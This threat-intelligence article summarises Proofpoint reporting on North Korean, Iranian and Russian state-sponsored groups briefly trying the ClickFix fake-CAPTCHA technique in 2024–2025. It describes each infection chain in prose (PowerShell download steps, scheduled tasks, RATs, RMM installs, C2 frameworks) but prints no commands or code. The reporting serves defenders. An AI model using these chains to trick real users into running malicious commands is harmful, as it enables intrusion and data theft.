Experimentation with the ClickFix Campaign by State-Sponsored Actors

Nation-state actors from North Korea, Iran, and Russia have each been observed incorporating the ClickFix social engineering technique into their cyber operations, demonstrating the willingness of state-sponsored actors to experiment with the technique within their existing tradecraft. ClickFix campaigns have often been used to deploy information-stealing malware. According to reporting by Proofpoint, these actors conducted isolated ClickFix campaigns from October 2024 through February 2025, though none appeared to adopt the method as a sustained tactic. “While several ClickFix sightings were observed, no actor had shown repeated use of the technique in the weeks following. It is unclear why each actor was only observed with one ClickFix campaign or wave while other typical campaigns continue in parallel. We initially hypothesized that this may be due to the technique’s early days among state-sponsored actors as they trial it, or perhaps the technique did not have as much success as others for machine compromise,” Proofpoint stated. Despite its limited use, the appearance of ClickFix across multiple state-sponsored operations in close succession suggests ongoing interest in social engineering innovation.

North Korea-linked TA427 (aka. APT43, Emerald Sleet, Kimsuky) was observed using ClickFix in January and February 2025. The campaign targeted individuals across fewer than five think tanks with decoy diplomatic content delivered via email attachments. Victims who clicked the embedded link were redirected to a fake CAPTCHA and instructed to execute a PowerShell command, which initiated a multistage infection chain. The initial PowerShell command downloaded an additional script and created scheduled tasks designed to run VBScripts at 19 and 20 minute intervals. In more advanced variants, the tasks fetched and executed batch scripts that decoded a secondary PowerShell payload responsible for launching QuasarRAT, a commodity RAT that communicated over port 80 to the C2. Proofpoint confirmed all infrastructure tied to the operation was newly registered as of January 2025 and largely hosted on compromised systems in South Korea using dynamic DNS services.

Iranian threat actor TA450 (aka. Mango Sandstorm, MuddyWater, Static Kitten) leveraged ClickFix over a two-day window on November 13 and 14, 2024, sending phishing emails from an attacker-controlled domain impersonating Microsoft. These messages were delivered to 39 organizations primarily across the Middle East, with the highest targeting density in the UAE and Saudi Arabia. The emails instructed users to run a PowerShell command that facilitated the silent installation of RMM tools, most notably Level, though telemetry from Proofpoint confirmed the historic use of Atera, PDQ Connect, ScreenConnect, and SimpleHelp. TA450 has not been observed using ClickFix since but has continued leveraging RMMs in follow-on operations, especially targeting government and finance entities, with additional targeting across sectors such as healthcare, education, energy, and telecommunications.

Russian-affiliated actors demonstrated two separate applications of ClickFix. The first, by a group referred to as UNK_RemoteRogue, began on December 9, 2024, targeting defense contractors through phishing emails sent via compromised Zimbra servers. These emails included a malicious link directing victims to a spoofed Microsoft Office page in Russian, instructing users to copy and execute a PowerShell payload. This payload ran JavaScript and PowerShell to establish communication with an Empire C2 server. Following this campaign, UNK_RemoteRogue reverted to more conventional techniques but retained infrastructure overlap and similar delivery mechanisms, including forged email headers and intermediate mail servers. In February 2025, the group delivered RDP files using password-protected links to enable remote access and credential capture. Separately, on October 17, 2024, TA422 (assessed with medium confidence by CERT-UA to be APT28) used a Google Sheets-themed phishing lure to initiate a reCAPTCHA prompt, triggering a PowerShell command that created an SSH tunnel and launched Metasploit modules—evidence of the group’s experiment with ClickFix before returning to standard toolsets.

Each of these operations demonstrates isolated use of the ClickFix technique within broader espionage campaigns, aligning with the pattern of trial-and-error adoption of cybercrime tactics by state-sponsored actors. While the technique has yet to become a staple within their toolkits, the near-simultaneous experimentation by multiple actors from different geopolitical spheres suggests continued interest in refining user-driven execution methods. Proofpoint’s analysis notes that TA427 may already be iterating on the tactic again as of April 2025, indicating that ClickFix may yet evolve into a more persistent feature of state-linked threat activity.